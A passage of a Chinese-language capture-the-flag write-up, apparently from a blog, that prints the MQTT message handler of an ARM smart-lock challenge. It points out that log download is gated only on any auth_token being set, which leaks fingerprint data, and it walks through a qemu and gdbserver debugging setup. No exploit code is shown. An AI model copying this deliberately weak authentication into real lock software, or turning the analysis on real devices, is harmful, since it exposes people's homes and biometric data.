src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-821\"  sizes=\"(max-width: 936px) 100vw, 936px\" \/><\/div><\/figure>\n\n\n\n<p>download\u51fd\u6570\uff0c\u5176\u5b9e\u5c31\u662f\u5806\u9898\u4e2d\u7684show\u51fd\u6570\uff0c\u4e5f\u5c31\u662f\u8fd9\u91cc\u53ef\u4ee5\u6cc4\u9732\u65e5\u5fd7\uff0cclear\u51fd\u6570\uff0c\u5c31\u662f\u91cd\u65b0\u6253\u5f00\u4e00\u904d\u65e5\u5fd7\u6587\u4ef6\uff0c\u76f8\u5f53\u4e8e\u628a\u4e4b\u524d\u7684\u6e05\u7a7a\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-73-1024x466.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"466\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-73-1024x466.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-822\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f00\u5173\u95e8\u51fd\u6570\uff0c\u5176\u5b9e\u5c31\u8bbe\u7f6e\u4e86\u4e00\u4e2a\u72b6\u6001\uff0c\u6ca1\u4ec0\u4e48\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void mqtt_lock::on_message(const struct mosquitto_message *message)\n{\n\n\tif(!strcmp(message-&gt;topic, \"auth_token\")){\n\t\tif (auth_token) {\n            unsubscribe(NULL, auth_token);\n            \/\/ log(\"close subncribe:%s\\n\",auth_token);\n            free(auth_token);\n        }\n        auth_token = (char*)malloc(0x11);\n        char * payload = (char*)message-&gt;payload;\n        for (int i = 0; i&lt;0x10;i++) {\n            if ((payload&#91;i] &lt;= '9' &amp;&amp; payload&#91;i] &gt;= '0') || (payload&#91;i] &lt;= 'Z' &amp;&amp; payload&#91;i] &gt;= 'A') || (payload&#91;i] &lt;= 'z' &amp;&amp; payload&#91;i] &gt;= 'a')) {\n                auth_token&#91;i] = payload&#91;i];\n            } else {\n                log(\"auth_token error: token must be num or letter\\n\");\n                free(auth_token);\n                auth_token = NULL;\n                return;\n            }\n        }\n        auth_token&#91;0x10] = 0;\n        log(\"auth_token:%s\\n\",auth_token);\n        char re_auth_token&#91;20];\n        snprintf(re_auth_token, 20, \"re_%s\", auth_token);\n\n        subscribe(NULL, auth_token);\n        \n        publish(NULL, re_auth_token, 11, \"finger tap\\n\");\n        \/\/ log(\"open subncribe:%s\\n\",auth_token);\n        \n        return;\n\n\t}\n    else if(!strcmp(message-&gt;topic, \"manager\")) {\n        \/*\n        {\n            \"session\": \"a1b2c3d4e5\",\n            \"request\": \"add_finger\",\n            \"req_args\": &#91;\n                \"john_doe\",\n                \"password123\",\n            ]\n        }*\/\n        \/\/ add_finger edit_finger remove_finger lock_door unlock_door\n        char *payload = (char*)message-&gt;payload;\n        char *session = nullptr;\n        char *request = nullptr;\n        char *req_args&#91;2] = {nullptr, nullptr};\n        bool paese_res = parse_json(payload, &amp;session, &amp;request, req_args);\n        if (!paese_res) {\n            log(\"json parse error\\n\");\n            return;\n        }\n        if (!session_id || strcmp(session,session_id)) {\n            log(\"session id mismatch\\n\");\n            goto END;\n        }\n        char output&#91;1024];\n        if (!strcmp(request,\"add_finger\")) {\n            if (req_args&#91;0] &amp;&amp; req_args&#91;0]&#91;0]== '&#91;' &amp;&amp; req_args&#91;0]&#91;strlen(req_args&#91;0])-1] == ']') {\n                if (add_finger(req_args&#91;0])) {\n                    snprintf(output,1024,\"new finger id:%d\\n\",max_finger_id-1);\n                    publish(NULL,session_id,strlen(output),output);\n                    goto END;\n                } \n            }\n            snprintf(output,1024,\"add finger failed\\n\");\n            publish(NULL,session_id,strlen(output),output);\n            goto END;\n        }\n        else if (!strcmp(request,\"edit_finger\")) {\n            if(!req_args&#91;0] || !req_args&#91;1]) {\n                publish(NULL,session_id,19,\"edit finger failed\\n\");\n                goto END;\n            }\n            if (req_args&#91;1]&#91;0] != '&#91;' || req_args&#91;1]&#91;strlen(req_args&#91;1])-1] != ']') {\n                publish(NULL,session_id,19,\"edit finger failed\\n\");\n                goto END;\n            }\n            unsigned int finger_id = atoi(req_args&#91;0]);\n            for (fingers * finger = finger_list; finger != NULL; finger = finger-&gt;next) {\n                if (finger-&gt;finger_id == finger_id) {\n                    if (edit_finger(finger,req_args&#91;1])) {\n                        snprintf(output,1024,\"changed finger id:%d\\n\",finger_id);\n                        publish(NULL,session_id,strlen(output),output);\n                        goto END;\n                    } else {\n                        publish(NULL,session_id,19,\"edit finger failed\\n\");\n                        goto END;\n                    }   \n                }\n            }\n            publish(NULL,session_id,19,\"edit finger failed\\n\");\n            goto END;\n        }\n        else if (!strcmp(request,\"remove_finger\")) {\n            if (!req_args&#91;0]) {\n                publish(NULL,session_id,21,\"remove finger failed\\n\");\n                goto END;\n            }\n            unsigned int finger_id = atoi(req_args&#91;0]);\n            if (remove_finger(finger_id)) {\n                snprintf(output,1024,\"removed finger id:%d\\n\",finger_id);\n                publish(NULL,session_id,strlen(output),output);\n                goto END;\n            } \n            else {\n                publish(NULL,session_id,21,\"remove finger failed\\n\");\n                goto END;\n            }\n        }\n        else if (!strcmp(request,\"lock_door\")) {\n            if (lock_door()) {\n                publish(NULL,session_id,18,\"lock door success\\n\");\n                goto END;\n            } else {\n                publish(NULL,session_id,17,\"lock door failed\\n\");\n                goto END;\n            }\n        }\n        else if (!strcmp(request,\"unlock_door\")) {\n            if (unlock_door()) {\n                publish(NULL,session_id,20,\"unlock door success\\n\");\n                goto END;\n            } else {\n                publish(NULL,session_id,19,\"unlock door failed\\n\");\n                goto END;\n            }\n        }\n        END:\n        if(session) free(session);\n        if(request) free(request);\n        if(req_args&#91;0]) free(req_args&#91;0]);\n        if(req_args&#91;1]) free(req_args&#91;1]);\n        return;\n    }\n    else if(!strcmp(message-&gt;topic, \"logger\")) {\n        char * payload = (char*)message-&gt;payload;\n        if (!auth_token){\n            publish(NULL, \"logfile\", 15, \"not authorized\\n\");\n            return;\n        }\n        if (!strcmp(payload,\"download\")) {\n            download_log();\n        }\n        else if (!strcmp(payload,\"clear\")) {\n            clear_log();\n        }\n    }\n    else if(auth_token &amp;&amp; !strcmp(message-&gt;topic, auth_token)) {\n        char * payload = (char*)message-&gt;payload;\n        char re_auth_token&#91;20];\n        snprintf(re_auth_token, 20, \"re_%s\", auth_token);\n        fingers* cur_finger = finger_list;\n        while (cur_finger != NULL) {\n            if (check_finger(cur_finger,payload)) {\n                if (session_id) {\n                    free(session_id);\n                    unsubscribe(NULL, session_id);\n                }\n                session_id = (char*)malloc(0x11);\n                for (int i = 0; i&lt;0x10;i++) {\n                    session_id&#91;i] = session_nums&#91;(rand()%62)];\n                }\n                session_id&#91;0x10] = 0;\n                char output_session&#91;0x30];\n                snprintf(output_session, 0x30, \"login successed. session_id: %s\\n\", session_id);\n                publish(NULL, re_auth_token, strlen(output_session), output_session);\n                return;\n            }\n            cur_finger = cur_finger-&gt;next;\n        }\n        publish(NULL, re_auth_token, 13, \"login failed\\n\");\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>\u672c\u9898\u4e2d\u6700\u91cd\u8981\u7684\u51fd\u6570\uff0c\u4e5f\u5c31\u662fmqtt\u5ba2\u6237\u7aef\u63a5\u6536\u5230\u4fe1\u606f\u7684\u56de\u8c03\u51fd\u6570\u2014\u2014on_message<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-74-1024x557.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"557\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-74-1024x557.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-823\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u9996\u5148\u662f\u767b\u5f55\u5904\u7406\u903b\u8f91<\/p>\n\n\n\n<p>\u8fd9\u91cc\u9700\u8981\u7528\u6237\u5728auth_token\u8bdd\u9898\u81ea\u5b9a\u4e49\u4e00\u4e2atoken\uff0c\u7136\u540e\u7cfb\u7edf\u4f1a\u8ba2\u9605token\u8fd9\u4e2a\u8bdd\u9898\uff0c\u6b64\u65f6auth_token\u4e0d\u518d\u4e3a\u7a7a\uff0c\u5982\u679c\u6709\u65b0\u7684token\uff0c\u4f1a\u5c06\u539f\u5148\u7684\u8986\u76d6\u6389<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-75.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"982\" height=\"455\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-75.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-824\"  sizes=\"(max-width: 982px) 100vw, 982px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u679c\u8bdd\u9898\u662flogger\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u67e5\u770b\u65e5\u5fd7\u6587\u4ef6\uff0c\u6cc4\u9732\u6307\u7eb9\u4fe1\u606f\uff0c\u8fd9\u91cc\u53ea\u8981\u6c42auth_token\u6709\u503c\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u4e00\u5f00\u59cb\u968f\u610f\u767b\u5f55\u4e00\u4e0b\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-76-1024x571.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"571\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-76-1024x571.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-825\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u5bf9\u5e94\u7684\u662f\u8eab\u4efd\u8ba4\u8bc1\u5904\u7406\u903b\u8f91\uff0c\u5728\u767b\u5f55\uff08auth_token\u4e0d\u4e3a\u7a7a\uff09\u4e4b\u540e\uff0c\u5c31\u8981\u53d1\u9001\u6307\u7eb9\u4fe1\u606f\uff0c\u968f\u540echeck_finger\u51fd\u6570\u5c31\u4f1a\u68c0\u6d4b\u662f\u5426\u662f\u6709\u6548\u6307\u7eb9\uff0c\u5982\u679c\u662f\uff0c\u5219\u4f1a\u8fd4\u56de\u4e00\u4e2asession_id<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-77-1024x693.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"693\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-77-1024x693.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-826\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6700\u540e\u662fmanager\u8bdd\u9898\uff0c\u9996\u5148\u8fd9\u4e2a\u8bdd\u9898\u4f1a\u5229\u7528parse_json\u51fd\u6570\u89e3\u6790\u51fasession\uff0crequest\uff0creq_args\u8fd9\u4e09\u4e2a\u53c2\u6570\uff0c\u968f\u540e\u4f1a\u6bd4\u8f83\u7528\u6237\u53d1\u9001\u7684session_id\u662f\u5426\u548c\u6210\u529f\u8ba4\u8bc1\u8fd4\u56de\u7684session_id\u76f8\u4e00\u81f4\uff0c\u5982\u679c\u4e00\u81f4\uff0c\u5219\u4f1a\u6839\u636erequest\u5bf9\u5e94\u7684\u8bf7\u6c42\u6267\u884c\u589e\u5220\u6539\u64cd\u4f5c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-78-1024x278.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"278\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-78-1024x278.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-827\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u6dfb\u52a0\u6307\u7eb9\u64cd\u4f5c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-79-1024x634.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"634\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-79-1024x634.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-828\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4fee\u6539\u6307\u7eb9\u64cd\u4f5c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-80-1024x515.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"515\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-80-1024x515.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-829\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5220\u9664\u6307\u7eb9\u64cd\u4f5c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-81-1024x628.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"628\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-81-1024x628.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-830\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f00\u5173\u95e8\u64cd\u4f5c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-82-1024x702.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"702\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-82-1024x702.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-831\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5176\u4ed6\u56de\u8c03\u51fd\u6570\u4e0d\u91cd\u8981<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%A6%82%E4%BD%95%E8%B0%83%E8%AF%95\"><\/span>\u5982\u4f55\u8c03\u8bd5<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%87%86%E5%A4%87gdbserver\"><\/span>\u51c6\u5907gdbserver<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>\u7531\u4e8e\u672c\u9898\u662farm\u67b6\u6784\uff0c\u6240\u4ee5\u9996\u5148\u4f60\u8981\u51c6\u5907\u4e00\u4e2aarm\u67b6\u6784\u7684gdbserver\uff0c\u6211\u662f\u76f4\u63a5\u4eceFirmAE\u91cc\u9762\u627egdbserver\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-86-1024x167.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"167\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-86-1024x167.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-842\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u6211\u9009\u62e9\u7528python\u8d77\u4e00\u4e2ahttp\u670d\u52a1\uff0c\u901a\u8fc7\u7f51\u7edc\u8fdb\u884c\u4f20\u8f93<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%BF%AE%E6%94%B9%E5%90%AF%E5%8A%A8%E8%84%9A%E6%9C%AC\"><\/span>\u4fee\u6539\u542f\u52a8\u811a\u672c<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>\u8fd9\u91cc\u6211\u4eec\u8981\u628a\u542f\u52a8\u811a\u672c\u4fee\u6539\u6210\u5982\u4e0b\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>qemu-system-arm -m 512 -M virt,highmem=off \\\n    -kernel zImage \\\n    -initrd rootfs.cpio \\\n    -net nic \\\n    -net user,hostfwd=tcp::8883-:8883,hostfwd=tcp::1234-:1234 \\\n    -nographic \\\n    -monitor null\n<\/code><\/pre>\n\n\n\n<p>\u589e\u6dfb\u4e00\u4e2a\u7aef\u53e3\u6620\u5c04\uff0c\u8fd9\u91cc\u6211\u9009\u62e9\u662f1234\uff0c\u7528\u4e8e\u8fde\u63a5gdbserver\uff0c\u8fd9\u4e2a\u7aef\u53e3\u53ef\u4ee5\u968f\u610f\u9009\u62e9<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E4%BC%A0%E8%BE%93gdbserver\"><\/span>\u4f20\u8f93gdbserver<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>\u6211\u4eec\u9700\u8981\u5c06\u6211\u4eecwsl\u91cc\u9762\u7684gdbserver\u4f20\u5230qemu\u865a\u62df\u673a\u91cc\uff0c\u5e78\u8fd0\u7684\u662fqemu\u865a\u62df\u673a\u91cc\u81ea\u5e26\u4e86wget\u547d\u4ee4\uff0c\u56e0\u6b64\u6211\u4eec\u76f4\u63a5\u901a\u8fc7\u7f51\u7edc\u4f20\u8f93\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>wget http:\/\/172.26.25.103:8000\/gdbserver.armel\nmv gdbserver.armel \/bin\/gdbserver\nchmod +x \/bin\/gdbserver<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"gdbserver%E9%99%84%E5%8A%A0%E5%88%B0%E7%8E%B0%E6%9C%89%E8%BF%9B%E7%A8%8B\"><\/span>gdbserver\u9644\u52a0\u5230\u73b0\u6709\u8fdb\u7a0b<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>ps\u770b\u4e00\u4e0b\u8fdb\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-87.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"946\" height=\"262\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-87.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-843\"  sizes=\"(max-width: 946px) 100vw, 946px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>gdbserver --attach :1234 63<\/code><\/pre>\n\n\n\n<p>\u5728\u672c\u673a\u4e2d\u542f\u52a8gdb-multiarch\uff0c\u7136\u540e\u8f93\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set architecture arm\nset endian little\ntarget remote localhost:1234\nset glibc 2.38<\/code><\/pre>\n\n\n\n<p>\u7531\u4e8e\u8fd9\u9898\u662f2.38\u7248\u672c\u7684\u5806\uff0c\u6240\u4ee5\u9700\u8981\u989d\u5916\u8bbe\u7f6e\u4e00\u4e0blibc\u7248\u672c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-88.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"961\" height=\"316\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-88.png\" 